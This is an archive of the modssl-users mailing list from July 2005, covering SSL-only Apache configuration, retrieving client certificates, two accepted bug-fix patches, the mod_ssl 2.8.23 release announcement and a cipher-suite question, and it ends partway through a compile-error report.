	for ; Tue, 5 Jul 2005 10:00:17 +0200
Subject: Jean-Pierre Guilloteau est absent(e).
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Tue, 5 Jul 2005 10:00:15 +0200
X-MIMETrack: Serialize by Router on M01ASPW/SRV/ASPAWAY(603HF91 | October 29, 2003) at
 07/05/2005 10:00:17 AM
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





Je serai absent(e) du  02/07/2005 au 25/07/2005.

Je r=E9pondrai =E0 votre message d=E8s mon retour.
Vous pouvez contacter Aspaway au 01 46 67 88 88.
Cordialement.=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  5 16:42:40 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 83F1B14D99B; Tue,  5 Jul 2005 16:42:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mclean-vscan1.bah.com (mclean-vscan1.bah.com [156.80.3.61])
	by master.modssl.org (Postfix) with ESMTP id EE73414D979
	for ; Tue,  5 Jul 2005 16:42:37 +0200 (CEST)
Received: from mclean-vscan1.bah.com (mclean-vscan1.bah.com [156.80.3.61])
	by mclean-vscan1.bah.com (8.11.0/8.11.0) with SMTP id j65EgW021623
	for ; Tue, 5 Jul 2005 10:42:33 -0400 (EDT)
Received: from mclnexbh03.resource.ds.bah.com ([156.80.7.153])
 by mclean-vscan1.bah.com (SAVSMTP 3.1.6.45) with SMTP id M2005070510423225415
 for ; Tue, 05 Jul 2005 10:42:32 -0400
Received: from MCLNEXVS07.resource.ds.bah.com ([156.80.7.141]) by mclnexbh03.resource.ds.bah.com with Microsoft SMTPSVC(6.0.3790.211);
	 Tue, 5 Jul 2005 10:42:33 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C5816F.C70E88D3"
Subject: Turning non-SSL traffic off
Date: Tue, 5 Jul 2005 10:42:34 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Turning non-SSL traffic off
Thread-Index: AcWBb8e/e22ZF2UPTICV8Zgu9ONxng==
From: "Hoda Nadeem" 
To: 
X-OriginalArrivalTime: 05 Jul 2005 14:42:33.0335 (UTC) FILETIME=[C733F070:01C5816F]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hoda Nadeem" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C5816F.C70E88D3
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

=20
What is the easiest and cleanest way to entirely turn all non-SSL
traffic off and only allow SSL traffic to pass through?=20
=20
Thanks.=20
=20
Nadeem
=20
Note: We are trying to use mod_rewrite, and it is currently messing up
the mod_jk connector:
=20


    RewriteEngine On

    #Accept nothing else than login processing on port 443

    RewriteCond %{SERVER_PORT} !443

    RewriteRule ^/(.*) /$1 [L,R]=20




------_=_NextPart_001_01C5816F.C70E88D3
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable







 


What =
is the easiest=20
and cleanest way to entirely turn all non-SSL traffic off and only allow =
SSL=20
traffic to pass through? 


 


Thanks.=20



 


Nadeem


 


Note:=20
We are trying to =
use=20
mod_rewrite, and it is currently messing up the mod_jk=20
connector:




 


<IfModule=20
mod_rewrite.c>




    RewriteEngine=20
On


    #Accept nothing =
else than=20
login processing on port 443


    RewriteCond =
%{SERVER_PORT}=20
!443


    RewriteRule =
^/(.*) <our domain name>/$1 [L,R]=20



</IfModule>
<=
/BODY>

------_=_NextPart_001_01C5816F.C70E88D3--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  5 18:58:48 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3E62514D9A9; Tue,  5 Jul 2005 18:58:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [70.61.80.18])
	by master.modssl.org (Postfix) with ESMTP id C90B414D982
	for ; Tue,  5 Jul 2005 18:58:47 +0200 (CEST)
Received: from blackhole.sysinfo.com (blackhole.sysinfo.com [70.61.80.19])
	by darkstar.sysinfo.com (8.12.11/8.12.11) with ESMTP id j65H43PQ006934;
	Tue, 5 Jul 2005 13:04:06 -0400
Date: Tue, 5 Jul 2005 13:03:58 -0400 (EDT)
From: "R. DuFresne" 
To: Hoda Nadeem 
Cc: modssl-users@modssl.org
Subject: Re: Turning non-SSL traffic off
In-Reply-To: 
Message-ID: 
References: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



don't open or bind to port 80, load the mod_ssl and force the browser to 
load and bind only to 443.  All done in the httpd.conf.  and then backed 
up with the firewall or screening router to deny port 80 requests.

Thanks,

Ron DuFresne

On Tue, 5 Jul 2005, Hoda Nadeem wrote:

>
> What is the easiest and cleanest way to entirely turn all non-SSL
> traffic off and only allow SSL traffic to pass through?
>
> Thanks.
>
> Nadeem
>
> Note: We are trying to use mod_rewrite, and it is currently messing up
> the mod_jk connector:
>
> 
>
>    RewriteEngine On
>
>    #Accept nothing else than login processing on port 443
>
>    RewriteCond %{SERVER_PORT} !443
>
>    RewriteRule ^/(.*) /$1 [L,R]
>
> 
>
>

- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFCyr2Bst+vzJSwZikRAhDrAJ0bRcpay0dt4Gxsm/NYEQjGvdDRAgCg2R4l
Z97Ie5WhpPi3ziXffx4Wb70=
=aVTr
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  6 04:21:43 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 26BD914D9A7; Wed,  6 Jul 2005 04:21:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from house.arach.net.au (house3.arach.net.au [203.30.44.68])
	by master.modssl.org (Postfix) with ESMTP id 8F2E714D993
	for ; Wed,  6 Jul 2005 04:21:40 +0200 (CEST)
Received: (qmail 17542 invoked from network); 6 Jul 2005 02:21:35 -0000
Message-ID: <20050706022135.17541.qmail@house.arach.net.au>
Received: from unknown (HELO pj28) (pj@netfire.com.au@203.153.243.58)
  by house3.arach.net.au with ESMTPA; 6 Jul 2005 02:21:34 -0000
From: "Pj" 
To: 
Subject: Certificates...
Date: Wed, 6 Jul 2005 10:16:04 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="windows-1250"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Thread-Index: AcWBgt1kfF6eOinKRAyNNRcORSD5mAATYQjw
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pj" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Does anyone know how to save incoming certificates to disk?
Or can anyone suggest a forum for apache module writers?

Cheers
..
Pj. 

-- 
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.323 / Virus Database: 267.8.9/41 - Release Date: 5/07/2005
 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  6 10:28:42 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8FF6514D9A9; Wed,  6 Jul 2005 10:28:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id 3B08814D993
	for ; Wed,  6 Jul 2005 10:28:41 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 461EA4CE54D; Wed,  6 Jul 2005 10:28:47 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 726F7A17A4; Wed,  6 Jul 2005 10:17:21 +0200 (CEST)
Date: Wed, 6 Jul 2005 10:17:21 +0200
From: "Ralf S. Engelschall" 
To: "Douglas K. Fischer" 
Cc: modssl-users@modssl.org
Subject: Re: Bug+Patch: mod_ssl 2.8.22 ssl_io_suck() timeout handling
Message-ID: <20050706081721.GA14159@engelschall.com>
References: <42C03147.3000900@fidoki.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <42C03147.3000900@fidoki.com>
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Jun 27, 2005, Douglas K. Fischer wrote:

> In debugging a number of issues we encountered on some of our web
> platforms, I discovered that the "presucking" routine in mod_ssl
> handles the timeout of pre-sucking the POST data in such a manner that
> the entire POST body must be read within the Timeout value (per the
> Apache conf). This seems contrary to the handling of POST reading,
> especially per mod_perl's handling of this, as well as the manner in
> which Apache handles writing of data. In both of these cases a call to
> ap_reset_timeout() is used in between successful reads/writes to reset
> the timeout. This allows a large and/or slow transfer to succeed,
> provided that data is  read/written at such a pace that some chunk is
> sent/received within the Timeout value. Without such a reset, either
> the Apache Timeout value has to be set to a very high number, or else
> slow/large transfers will always fail if a pre-suck is required.
>
> Correcting this requires a simple 1-line patch to ssl_engine_io.c,
> listed below.
>
> --------------------------------------------------------------------------
> diff -Pur mod_ssl-2.8.22-1.3.33.orig/pkg.sslmod/ssl_engine_io.c
> mod_ssl-2.8.22-1.3.33/pkg.sslmod/ssl_engine_io.c
> --- mod_ssl-2.8.22-1.3.33.orig/pkg.sslmod/ssl_engine_io.c       Sat
> Jul 17 02:52:22 2004
> +++ mod_ssl-2.8.22-1.3.33/pkg.sslmod/ssl_engine_io.c    Mon Jun 27
> 12:32:10 2005
> @@ -228,6 +228,7 @@
> ~             while ((len = ap_get_client_block(r, buf, buflen)) > 0) {
> ~                 ssl_io_suck_record(r, buf, len);
> ~                 sucked += len;
> +                ap_reset_timeout(r);
> ~             }
> ~             ssl_io_suck_end(r);
> ~             ap_kill_timeout(r);
> --------------------------------------------------------------------------

Ok, finally taken over for inclusion into mod_ssl 2.8.23.
Thanks for your feedback.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  6 10:28:42 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 91C5814D9AC; Wed,  6 Jul 2005 10:28:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id 3AFD414D97F
	for ; Wed,  6 Jul 2005 10:28:41 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 353734CE541; Wed,  6 Jul 2005 10:28:47 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4BE9EA17A4; Wed,  6 Jul 2005 10:27:43 +0200 (CEST)
Date: Wed, 6 Jul 2005 10:27:43 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: updating ca-bundle.crt
Message-ID: <20050706082743.GA16036@engelschall.com>
References: <20050202134501.GA13157@redhat.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20050202134501.GA13157@redhat.com>
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Feb 02, 2005, Joe Orton wrote:

> There was some discussion on modssl-users a while back on this topic; we
> had some concerns about extracting ca-bundle.crt directly from the
> Mozilla CA list sources.  But after discussing this with Frank Hecker
> and some others there is agreement that there are no licensing issues
> here really.
>
> So, attached is a Perl script which regenerates ca-bundle.crt directly
> from the Mozilla certdata.txt: Ralf, feel free to include this in
> mod_ssl or just update the mod_ssl ca-bundle.crt using it ;)

Thanks, Joe. I'll include this script into mod_ssl 2.8.23 together
with its latest output.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  6 10:39:45 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 64A6D14D9A4; Wed,  6 Jul 2005 10:39:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web42401.mail.yahoo.com (web42401.mail.yahoo.com [66.218.93.224])
	by master.modssl.org (Postfix) with SMTP id A269A14D97F
	for ; Wed,  6 Jul 2005 10:39:43 +0200 (CEST)
Received: (qmail 15269 invoked by uid 60001); 6 Jul 2005 08:39:05 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=sStQu0zlCGMaRqHOQQD6m6Qt0Uu9cMPIeJIBDbCMI8P78GS8UKkAif++I5ipLp8IzAwV/tTRiq/JUKP3p5EelGqI1Cxj7vCJmCe38Gjwe/+dz3cbfrAbl4+EoFmvVqlU+cyzgd3b4zNNlT+/QepKwUdfiyGWnHjKHNS+Hr9SxrQ=  ;
Message-ID: <20050706083905.15267.qmail@web42401.mail.yahoo.com>
Received: from [62.129.121.32] by web42401.mail.yahoo.com via HTTP; Wed, 06 Jul 2005 01:39:05 PDT
Date: Wed, 6 Jul 2005 01:39:05 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: Certificates...
To: modssl-users@modssl.org
In-Reply-To: <20050706022135.17541.qmail@house.arach.net.au>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You could use the ssl_var_lookup function in a
module... 

cert = ssl_var_lookup(r->pool, r->server,
r->connection, r, "SSL_CLIENT_CERT");

or a cgi/php page and env variables
http://www.modssl.org/docs/2.8/ssl_reference.html#ToC25.

As for module writting look at the source of the
modules that ship with apache (auth ones are an easy
start). Not sure about forums.

Regards
Matt  



--- Pj  wrote:

> Does anyone know how to save incoming certificates
> to disk?
> Or can anyone suggest a forum for apache module
> writers?
> 
> Cheers
> ..
> Pj. 
> 
> -- 
> No virus found in this outgoing message.
> Checked by AVG Anti-Virus.
> Version: 7.0.323 / Virus Database: 267.8.9/41 -
> Release Date: 5/07/2005
>  
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



		
____________________________________________________
Sell on Yahoo! Auctions – no fees. Bid on great items.  
http://auctions.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  6 15:00:16 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9914C14D993; Wed,  6 Jul 2005 15:00:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id 73ED214D97F
	for ; Wed,  6 Jul 2005 15:00:16 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C0B314CE506; Wed,  6 Jul 2005 15:00:21 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4CF27A17A8; Wed,  6 Jul 2005 14:34:34 +0200 (CEST)
Date: Wed, 6 Jul 2005 14:34:34 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: Connection time out problems
Message-ID: <20050706123434.GA15626@engelschall.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Jun 10, 2005, Brian J. France wrote:

> I have a case where a https connection times out, which causes an alarm
> to trigger, apache start shutting down and mod_ssl tries to flush the
> buffer in a non-blocking way and hangs the connection until restart
> (see the backtrace below).
>
> I think the cause of this is the http_main.c patch for EAPI (see below)
> because it inserts the ap_call_close_connection_hook before setting
> B_EOUT instead of after.  If it would set B_OUT first and then call
> ap_call_close_connection_hook, any ap_bflush or ap_bwrite calls would
> return (-1) instead of trying to write data to the socket (in a
> non-blocking way).
>
> Thoughts?

I've now looked into this subtle problem in more detail and I think
your analysis is correct. The ap_bflush() in mod_ssl will hang the
connection if we don't set B_EOUT before calling the EAPI connection
close hook. For mod_ssl 2.8.23 I've now adjusted the two calls to
ap_call_close_connection_hook() to occur _after_ the ap_bsetflag() call.
Thanks for your feedback.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  6 15:01:08 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9348B14D9A9; Wed,  6 Jul 2005 15:01:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id 46EA614D97F;
	Wed,  6 Jul 2005 15:01:07 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 966754CE506; Wed,  6 Jul 2005 15:01:13 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2618CA17A8; Wed,  6 Jul 2005 15:01:01 +0200 (CEST)
Date: Wed, 6 Jul 2005 15:01:01 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.23 for Apache 1.3.33 and OpenSSL 0.9.8
Message-ID: <20050706130101.GA48684@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

As OpenSSL 0.9.8 was released today, I've released another maintenance
version mod_ssl 2.8.23 for use with Apache 1.3.33 and OpenSSL 0.9.8.
Included are also a few other changes (see below for details).

Get mod_ssl 2.8.23 from:

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.23 (30-Oct-2004 to 06-Jul-2005)

   *) Ported to OpenSSL 0.9.8

   *) Fixed connection timeout handling by calling the EAPI connection
      close hook after (and not before) the B_OUT flag was set on the
      underlying I/O buffer in order to prevent attempted buffer flushes
      from blocking the connection.

   *) Updated the ca-bundle.crt file from Mozilla's "certdata.txt"
      (CVS revision 1.37).

   *) Fix timeout handling in POST request processing by resetting
      timeouts.

   *) Fixed double-definition of OPENSSL_free under OpenSSL 0.9.6 by
      fixing the version test in ssl_util_ssl.h

   *) Adjusted all copyright messages to contain the new year 2005 ;)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  6 15:29:08 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 98B7714D993; Wed,  6 Jul 2005 15:29:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web30303.mail.mud.yahoo.com (web30303.mail.mud.yahoo.com [68.142.200.96])
	by master.modssl.org (Postfix) with SMTP id F2A1314D97F
	for ; Wed,  6 Jul 2005 15:29:07 +0200 (CEST)
Received: (qmail 50642 invoked by uid 60001); 6 Jul 2005 13:28:48 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=Ol5OgX0soxpSJqmlkObUko5ylGmryvB/z3SloveM2pLL5ypuyL/0k8ZzftBuKvEki9/Xg3Sbxk+fssYZsvy0Z9TmNemSgiad0AO5z0hkzJq9OdxY8UXyVE5AfY7COUv8QjYf7EjhLD47lM7KUecp8PxJgZlFOeeTf17+57e7hvY=  ;
Message-ID: <20050706132848.50639.qmail@web30303.mail.mud.yahoo.com>
Received: from [220.227.147.6] by web30303.mail.mud.yahoo.com via HTTP; Wed, 06 Jul 2005 06:28:48 PDT
Date: Wed, 6 Jul 2005 06:28:48 -0700 (PDT)
From: Sourabh Bhandari 
Subject: Re: change cipher suite of a virtual host without restarting apache
To: modssl-users@modssl.org
In-Reply-To: <20050701142723.66588.qmail@web42410.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sourabh Bhandari 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Matt, 

Thanks for the reply. 

I can't have as many instances of httpd running as
there are number of sites, so I've to figure out a way
to do it using single instance of httpd running (I'm
not bothered about the forks performed by apache
itself).

I think I've found a solution to this by patching
ssl_io_filter_connect() function in ssl_engine_io.c. 

Before mod_ssl tries to make a connection with OpenSSL
(either SSL_connect, or SSL_accept), I make a call to
SSL_set_cipher_list() to set cutomized cipher list.

This way, just before connection takes place, I've
customized cipher-suite in place. 

Regards,
-Sourabh 
--- Matt Stevenson  wrote:

> AFAIK this is not possible with a virtual host.
> However there is no reason you can't run each
> virtual
> host as it's own server (split off into own config,
> use the -f and -d options). It really depends on the
> your load and flexibility requirements. Currently
> some
> servers I manage have 50+ apache servers. While not
> the best for memory and efficency, the flexibility
> is
> good.
> 
> Regards
> Matt
> 
> --- Sourabh Bhandari 
> wrote:
> 
> > Hi, 
> > 
> > I've Apache running as reverse proxy on Linux with
> > SSL
> > (mod_ssl). 
> > 
> > There are multiple sites behind the Apache. 
> > 
> > There are cases when cipher-suite or certificate
> for
> > a
> > site has to be changed. In that case Apache is
> > restarted to take changes in account. 
> > 
> > This results in disconnection of all the connected
> > users (whether they are connected for site for
> which
> > changes are done or for the sie for which nothing
> > has
> > been changed).
> > 
> > Is there a way I can modify cipher-suite or
> > certificate so that I dont need to restart the
> > Apache
> > and all the users session stay valid and working.
> (I
> > wont mind if users connected to site for which
> > changes
> > are made get disconnected).
> > 
> > Thanks in advance, 
> > 
> > -Sourabh
> > 
> > __________________________________________________
> > Do You Yahoo!?
> > Tired of spam?  Yahoo! Mail has the best spam
> > protection around 
> > http://mail.yahoo.com 
> >
>
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)             
>  
> >    www.modssl.org
> > User Support Mailing List                     
> > modssl-users@modssl.org
> > Automated List Manager                           
> > majordomo@modssl.org
> > 
> 
> 
> 		
> ____________________________________________________
> 
> Yahoo! Sports 
> Rekindle the Rivalries. Sign up for Fantasy Football
> 
> http://football.fantasysports.yahoo.com
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul  7 20:11:26 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 962B714D9AC; Thu,  7 Jul 2005 20:11:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cobi.astro-radio.intranet (251.Red-213-97-147.pooles.rima-tde.net [213.97.147.251])
	by master.modssl.org (Postfix) with ESMTP id E09FF14D99B
	for ; Thu,  7 Jul 2005 20:11:25 +0200 (CEST)
Received: from [192.168.100.5] (radio.astro-radio.intranet [192.168.100.5])
	by cobi.astro-radio.intranet (8.12.10/8.12.10) with ESMTP id j67IBIH9028889
	for ; Thu, 7 Jul 2005 20:11:19 +0200
Date: Thu, 07 Jul 2005 20:12:53 +0200
From: Salvador Caballe 
To: modssl-users@modssl.org
Subject: Compile error
Message-Id: <20050707200637.C143.EA3BKZ@amsat.org>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.12.01 [en]
X-Virus-Scanned: by amavisd-milter (http://amavis.org/)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Salvador Caballe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I just download the latest mod_ssl version, to upgrade
my apache server.


I installed and compiled the previous versions without problems, but I have
this errors when compile apache program with mod_ssl:

gcc -c  -I./os/unix -I./include   -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208123 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci` modules.c
gcc -c  -I./os/unix -I./include   -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208123 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci` buildmark.c
gcc  -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208123 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci` -L/home/users/scaballe/openssl-0.9.8   \
